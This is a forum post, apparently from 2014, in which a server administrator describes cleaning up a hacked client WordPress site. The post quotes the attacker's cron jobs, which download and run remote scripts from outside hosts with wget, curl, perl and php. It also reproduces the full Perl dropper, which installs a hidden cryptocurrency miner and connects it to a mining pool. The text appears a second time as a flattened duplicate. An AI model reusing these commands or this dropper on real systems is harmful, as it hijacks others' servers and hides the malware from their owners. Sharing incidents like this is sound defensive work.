GoFuckYourself.com - Adult Webmaster Forum - View Single Post

sarettah · 06-02-2014, 03:23 PM

So, one of my servers was running at about 400% apparently.

When all was said and done it seems that someone used a WP hack on one of my clients WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts.

the cron job appears to create an instance of a bitcoin mining operation of some kind.

I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage

This is one of the crons that was created:

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc*
10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

*/6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt

************************************End of cron

And this is the little perl script that they pull in in the abc.txt file:

#!/usr/bin/perl
system("killall -9 minerd");
system("killall -9 PWNEDa");
system("killall -9 PWNEDb");
system("killall -9 PWNEDc");
system("killall -9 PWNEDd");
system("killall -9 PWNEDe");
system("killall -9 PWNEDg");
system("killall -9 PWNEDm");
system("killall -9 minerd64");
system("killall -9 minerd32");
system("killall -9 named");
$rn=1;
$ar=`uname -m`;
while($rn==1 || $rn==0) { $rn=int(rand(11)); }
$exists=`ls /tmp/.Ice-unix`;
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch=~/kernelcfg/gi || $cratchx=~/kernelupdates/gi) { die; }

if($exists!~/kernelcfg/gi) {
$wig=`wget --version | grep GNU`;
if(length($wig)<6) {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
} else {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
}
} else {
if($ar=~/64/g) {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
} else {
system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg");
}
}
}

@prts=('8332','9091','1121','7332','6332','1332',' 9333','2961','8382','8332','9091','1121','7332','6 332','1332','9333','2961','8382');
$prt=0;
while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
print "setup for $rn:$prt done :-)\n";

while(1) {
$cratch=`ps aux | grep -v grep | grep kernelcfg`;
$cratchx=`ps aux | grep -v grep | grep kernelupdates`;
if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) {
system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
}
sleep(5);
}

************************************************** **

I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet.

So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p

06-02-2014, 03:23 PM
sarettah see you later, I'm gone Industry Role: Join Date: Oct 2002 Posts: 14,122	hacking Assholes So, one of my servers was running at about 400% apparently. When all was said and done it seems that someone used a WP hack on one of my clients WP installs and then managed to somehow gain shell access to set up 2 cron jobs, one under each of 2 different user accounts. the cron job appears to create an instance of a bitcoin mining operation of some kind. I found it being discussed here: http://serverfault.com/questions/598...-100-cpu-usage This is one of the crons that was created: /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* 10 2 * * * killall -9 /usr/bin/host;cd /tmp;wget http://95.154.227.98/.../libcfg.txt;curl -O http://95.154.227.98/.../libcfg.txt;mv libcfg.txt libcfg.php;php libcfg.php /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt /6 * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-wendn-web.com/.../abc.txt;perl abc.txt;rm -f abc.txt **********************************End of cron And this is the little perl script that they pull in in the abc.txt file: #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall -9 PWNEDm"); system("killall -9 minerd64"); system("killall -9 minerd32"); system("killall -9 named"); $rn=1; $ar=`uname -m`; while($rn==1 \|\| $rn==0) { $rn=int(rand(11)); } $exists=`ls /tmp/.Ice-unix`; $cratch=`ps aux \| grep -v grep \| grep kernelcfg`; $cratchx=`ps aux \| grep -v grep \| grep kernelupdates`; if($cratch=~/kernelcfg/gi \|\| $cratchx=~/kernelupdates/gi) { die; } if($exists!~/kernelcfg/gi) { $wig=`wget --version \| grep GNU`; if(length($wig)<6) { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } else { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;wget http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } } else { if($ar=~/64/g) { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } else { system("mkdir /tmp;mkdir /tmp/.Ice-unix;cd /tmp/.Ice-unix;curl -O http://41.215.22.162/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelcfg;chmod +x ./kernelcfg"); } } } @prts=('8332','9091','1121','7332','6332','1332',' 9333','2961','8382','8332','9091','1121','7332','6 332','1332','9333','2961','8382'); $prt=0; while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; } print "setup for $rn:$prt done :-)\n"; while(1) { $cratch=`ps aux \| grep -v grep \| grep kernelcfg`; $cratchx=`ps aux \| grep -v grep \| grep kernelupdates`; if($cratch!~/kernelcfg/gi && $cratch!~/kernelupdates/gi) { system("cd /tmp/.Ice-unix;./kernelcfg -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &"); } sleep(5); } ********************************************** I am getting the idea that it is a bitcoin mining thing only because of some of the variable names in there and the discussion I linked to. I have not examined the code at all yet. So, how many coins do you think they managed to do off my little server? I am guessing about .00000000001 BC across the week ;p __________________ All cookies cleared!